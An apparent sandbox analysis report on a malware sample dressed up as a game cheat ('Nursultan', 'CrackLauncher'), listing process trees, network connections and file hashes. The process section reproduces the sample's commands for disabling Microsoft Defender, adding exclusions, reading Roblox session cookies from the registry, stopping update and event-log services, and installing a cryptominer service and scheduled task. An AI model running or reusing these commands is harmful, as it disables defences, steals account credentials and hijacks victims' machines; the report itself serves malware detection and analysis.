PID 2128 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 2128 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 2128 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 2128 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
PID 2128 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
PID 4584 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\SYSTEM32\attrib.exe
PID 4584 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\SYSTEM32\attrib.exe
PID 1888 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\system32\cmd.exe
PID 1888 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\system32\cmd.exe
PID 4584 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe

"C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "XMRKNZQC"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "XMRKNZQC" binpath= "C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\svchost.exe

svchost.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 30.178.252.5.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 unknown-sunglasses.gl.at.ply.gg udp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 6.173.189.20.in-addr.arpa udp

Files

memory/2128-0-0x00007FF8AFBD3000-0x00007FF8AFBD5000-memory.dmp

memory/2128-1-0x0000000000480000-0x0000000000780000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s1mrhdqp.xif.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/464-11-0x0000022CEAD90000-0x0000022CEADB2000-memory.dmp

memory/464-12-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp

memory/464-13-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp

memory/464-14-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp

memory/464-17-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp

memory/2128-18-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

MD5 a1d8db2a1ff742bc73dd5617083f5fde
SHA1 957b182d82efb40a36099dd886ad581977880838
SHA256 d715e599815190df86069fae7220db64b5999207f77fb6e41cfe318d34c7399a
SHA512 0c5407f5707e5f2808cf1d85d71815ca67d45edc8bd8a83cc424dc927afcbad6ced5a826fff81549e5684ca0ece039513c3351ce7bf231e37885f7ed04dc513f

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e907f77659a6601fcc408274894da2e
SHA1 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA512 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

MD5 f0b33cc162bfd36a995b8c90cd8ebff1
SHA1 ca1ddef08d47fc15a44a2d651b61e3decce8ebc6
SHA256 6363305dc75b8bf7aa2a8b31b0b0f38022fb0139f809ecba42e5cfe7530830e0
SHA512 1426cd246662adfd9aba4434586dc3bd54d31d395d9fafdcb15e785461a466567bff62e85085c36043cca047f951a96e5fc359c5cbf1000ff3121bba6b2905d0

memory/4584-50-0x000001A8B4AC0000-0x000001A8B4B00000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fa8d1461e4feb2c39654e3a555a027f8
SHA1 0ca46b8961ceba8f9da31de5ed2408643fc89141
SHA256 7e26e4f0ef3a7d2904818a691429789c4781029ff4aab697c3b7c9a4287d661f
SHA512 e486b8f029c7eec60b6b2b5603390330afb1ddf627cc01c511808c47e68676b4c429b9f75fd4e16e48b496dccfe8cc8ec4a35825e1e889e66571acb6c03e0869

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

MD5 0df0a039309525fd27e1b5e056c92b6a
SHA1 7551c27a9123cb56c4218647966a753794ac2961
SHA256 a29379238f93fa6301dd390e635b0c1f53d9197c68adc0f00cbc52bb4311a23f
SHA512 2c00ea216368e254167bd5f2562cbc93953b9c4756765f4504aaae7e9dc45e5584fef1ddb174b651a9a090c7217424e5b80dec58f6f2493c54704f46c35fede6

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

MD5 c137c5f5287d73a94d55bc18df238303
SHA1 95b4b01775bea14feaaa462c98d969eb81696d2c
SHA256 d294856177658df0159cfe937e5ea95a8ee8a2ca85754d897aea3bb5d0d962c0
SHA512 ba595d185ae98152658ce95964fd6bcce7e970896b0b1c674a142d126cf0433094debcd25527d9b4f5a6568cc5a8a42aeaef536166748eea3973f8b694564aa5

memory/2128-82-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ef72c47dbfaae0b9b0d09f22ad4afe20
SHA1 5357f66ba69b89440b99d4273b74221670129338
SHA256 692ec20c7039170fb199510f0436181fd155e6b4516d4d1c9e1675adf99aaa7f
SHA512 7514b6bc8dc39fa618223300be27cd535dc35b18c66b4a089e2302e72b3e0cac06d88a989fa1296feb386b3cbe2084019df6430c7f895071b76e04ce559a30b4

memory/4244-94-0x0000000000940000-0x0000000000B28000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 65a68df1062af34622552c4f644a5708
SHA1 6f6ecf7b4b635abb0b132d95dac2759dc14b50af
SHA256 718dc2f5f4a6dbb7fab7f3db05bd7f602fb16526caae7084ab46c3ab4e7bad35
SHA512 4e460eb566032942547b58411222dd26ae300a95f83cf5ae6df58ebd28594341123611b348bd4031a33bc7f38307d5cb8fb677bba8c896919e3eee677a104d4d

memory/4584-108-0x000001A8CF230000-0x000001A8CF2A6000-memory.dmp

memory/4584-109-0x000001A8CF2B0000-0x000001A8CF300000-memory.dmp

memory/4584-110-0x000001A8B6750000-0x000001A8B676E000-memory.dmp

memory/4244-111-0x00000000054D0000-0x000000000556C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 07d142044fb78e359c794180a9c6fdff
SHA1 8a7155f93a53ff1b7f382a4ccb3f58ff2f88808e
SHA256 2af8c3ca529953085ca25f69d9142964e2ce5508665c14f3533a47d254fed3ea
SHA512 356edd3598c09b765c3de325bc47c5c8ae7fcfd87e8c58e12e8bb6437f1d7ce58310e06c4d64336815833e280f2e61c288edb09508c4f29876d28b0d602aeb78

memory/4244-135-0x00000000061C0000-0x0000000006764000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 88be3bc8a7f90e3953298c0fdbec4d72
SHA1 f4969784ad421cc80ef45608727aacd0f6bf2e4b
SHA256 533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a
SHA512 4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

memory/4244-147-0x0000000005C90000-0x0000000005D46000-memory.dmp

memory/1248-148-0x0000000000400000-0x0000000000412000-memory.dmp

memory/4584-153-0x000001A8B6790000-0x000001A8B679A000-memory.dmp

memory/4584-154-0x000001A8B67C0000-0x000001A8B67D2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 75f5f6d1505c3d09f147fec53238c2c0
SHA1 508feb25bce53e5e3ac0b4ed70c1992e329bf07b
SHA256 464fbbbdf5db7ad5b4341e6f1fd33d4db12534e3df2769fc5efc51b4e0b47b33
SHA512 f5cc3a6b86c22994b5e7e01803e037b1ed4c7b48698b6b29087b5e5042c9cdb3697c3dc58e261f7bd9200b0133da7601aee21643b09a152553c1d05c51424461

memory/3616-170-0x0000000004E20000-0x0000000004E56000-memory.dmp

memory/3616-171-0x00000000054C0000-0x0000000005AE8000-memory.dmp

memory/3616-176-0x0000000005410000-0x0000000005432000-memory.dmp

memory/3616-177-0x0000000005BF0000-0x0000000005C56000-memory.dmp

memory/3616-178-0x0000000005D50000-0x0000000005DB6000-memory.dmp

memory/3616-188-0x0000000005EC0000-0x0000000006214000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 894afb4ff3cd7ee1f69400e936f8fc9d
SHA1 aa0eb6ac58f8997940c1aa2e6f6c42d7c3837e51
SHA256 20948b37924c58362ffc5d1472667b53c6d7fc865ad541c901cebf41d04a03c9
SHA512 449494468d267f9689a277ce858dac7dfda04ceb568f60170645582fd631901a9ef780da8e420cba8a297edc11cd63a874e3429b95cf90e7261d2b9ab8850e98

memory/3616-200-0x0000000006410000-0x000000000645C000-memory.dmp

memory/3616-199-0x00000000063C0000-0x00000000063DE000-memory.dmp

memory/3616-215-0x0000000070890000-0x00000000708DC000-memory.dmp

memory/3616-214-0x0000000006980000-0x00000000069B2000-memory.dmp

memory/3616-225-0x00000000069C0000-0x00000000069DE000-memory.dmp

memory/3616-226-0x00000000075F0000-0x0000000007693000-memory.dmp

memory/2944-236-0x00000196FE090000-0x00000196FE0AC000-memory.dmp

memory/2944-237-0x00000196FE0B0000-0x00000196FE165000-memory.dmp

memory/3616-238-0x0000000007D30000-0x00000000083AA000-memory.dmp

memory/2944-239-0x00000196FE080000-0x00000196FE08A000-memory.dmp

memory/3616-240-0x00000000076F0000-0x000000000770A000-memory.dmp

memory/3616-241-0x0000000007760000-0x000000000776A000-memory.dmp

memory/2944-242-0x00000196FE2D0000-0x00000196FE2EC000-memory.dmp

memory/3616-243-0x0000000007960000-0x00000000079F6000-memory.dmp

memory/3616-244-0x0000000007920000-0x0000000007931000-memory.dmp

memory/2944-245-0x00000196FE2B0000-0x00000196FE2BA000-memory.dmp

memory/2944-246-0x00000196FE310000-0x00000196FE32A000-memory.dmp

memory/2944-247-0x00000196FE2C0000-0x00000196FE2C8000-memory.dmp

memory/2944-248-0x00000196FE2F0000-0x00000196FE2F6000-memory.dmp

memory/2944-249-0x00000196FE300000-0x00000196FE30A000-memory.dmp

memory/3616-252-0x0000000007940000-0x000000000794E000-memory.dmp

memory/3616-253-0x0000000007A00000-0x0000000007A14000-memory.dmp

memory/3616-254-0x0000000007A50000-0x0000000007A6A000-memory.dmp

memory/4600-259-0x0000000140000000-0x000000014000E000-memory.dmp

memory/4600-258-0x0000000140000000-0x000000014000E000-memory.dmp

memory/812-264-0x0000000140000000-0x0000000140848000-memory.dmp

memory/812-268-0x0000000140000000-0x0000000140848000-memory.dmp

memory/812-270-0x000001B194D50000-0x000001B194D70000-memory.dmp

memory/812-272-0x0000000140000000-0x0000000140848000-memory.dmp

memory/3616-271-0x0000000007A30000-0x0000000007A38000-memory.dmp

memory/812-273-0x0000000140000000-0x0000000140848000-memory.dmp

memory/812-276-0x0000000140000000-0x0000000140848000-memory.dmp

memory/812-275-0x0000000140000000-0x0000000140848000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b1964f71ab2b69655a2994782b875132
SHA1 0e548645cab1dda0c3d5d528393a08ce0b6fe6a5
SHA256 b9cef8300f65c804798ca1f4437408825d29f80429412a5bb8664284953b18f4
SHA512 54b47140ef4cf71f850e0852c66f01960c312f5c2bb476550d18bb1f5a3640f6eeb12b867d4057cd3d7c353820af2815fea5bb999cfcf6ca81d6e4882efbbf1f

memory/812-274-0x0000000140000000-0x0000000140848000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

memory/812-269-0x0000000140000000-0x0000000140848000-memory.dmp

memory/812-267-0x0000000140000000-0x0000000140848000-memory.dmp

memory/812-266-0x0000000140000000-0x0000000140848000-memory.dmp

memory/812-265-0x0000000140000000-0x0000000140848000-memory.dmp

memory/812-263-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4600-257-0x0000000140000000-0x000000014000E000-memory.dmp

memory/4600-256-0x0000000140000000-0x000000014000E000-memory.dmp

memory/4600-255-0x0000000140000000-0x000000014000E000-memory.dmp

memory/4600-262-0x0000000140000000-0x000000014000E000-memory.dmp

memory/4964-283-0x00000000060F0000-0x0000000006444000-memory.dmp

memory/4964-292-0x0000000070890000-0x00000000708DC000-memory.dmp

memory/4816-308-0x0000000005E50000-0x00000000061A4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aaf7b04e5be4bb88401156f4d8f34761
SHA1 f75e2c47377abdf27b1e2c4e73e69c5bff3e5171
SHA256 bf36186c9d6f77f6c8e2a728acea18d88c3e57de96724f4da7bca1c3068286a1
SHA512 3ca79af34fbd2b1167dce18e33ccb0c16f40f9306c27242ac878c60892ef2c01f2b6af4e01d3f0c251a54ab27b4228eab0bed0927a5fa0f8c09efb431c58ad56

memory/4816-314-0x0000000070890000-0x00000000708DC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bcb4bbb1531c93c8bb72dfe947c111a7
SHA1 8dd388d15f8d0f39de79a248682b67a0617ea069
SHA256 0eab3d15bc1e82c559b068f396928633378e07dc299fbd8d54e6517e615131d0
SHA512 8a9964419f1aea9a06c692619c545089394407b0ca742611e1389051f69a2f432294e032ae8c53a5282b69f7dfbfe251fb8634f2898b5615c2dee741187a5f89

memory/1976-335-0x0000000070890000-0x00000000708DC000-memory.dmp

memory/1248-350-0x0000000006A60000-0x0000000006AF2000-memory.dmp

memory/1248-351-0x0000000006460000-0x000000000646A000-memory.dmp

C:\Users\Admin\AppData\Roaming\svchost.exe

MD5 8fdf47e0ff70c40ed3a17014aeea4232
SHA1 e6256a0159688f0560b015da4d967f41cbf8c9bd
SHA256 ed9884bac608c06b7057037cc91d90e4ae5f74dd2dbce2af476699c6d4492d82
SHA512 bd69d092ed4f9c5e1f24eaf5ec79fb316469d53849dc798fae0fcba5e90869b77ee924c23cc6f692198ff25827ab60ad47bb46cadd6e0aadde7731cbafb013be

memory/2972-354-0x00000000005D0000-0x0000000000610000-memory.dmp

memory/2972-355-0x00000000052E0000-0x00000000052FA000-memory.dmp

memory/2972-356-0x0000000005760000-0x00000000058BA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log

MD5 0efd0cfcc86075d96e951890baf0fa87
SHA1 6e98c66d43aa3f01b2395048e754d69b7386b511
SHA256 ff981780f37479af6a428dd121eef68cf6e0b471ae92f080893a55320cc993f7
SHA512 4e79f5a8494aac94f98af8dbbc71bdd0a57b02103757ad970da7e7d4e6a0dc5015ca008256a6bd2c5bdec3a0f5736a994e17b3ef004b0f374a3339e480ac41b1

memory/812-361-0x0000000140000000-0x0000000140848000-memory.dmp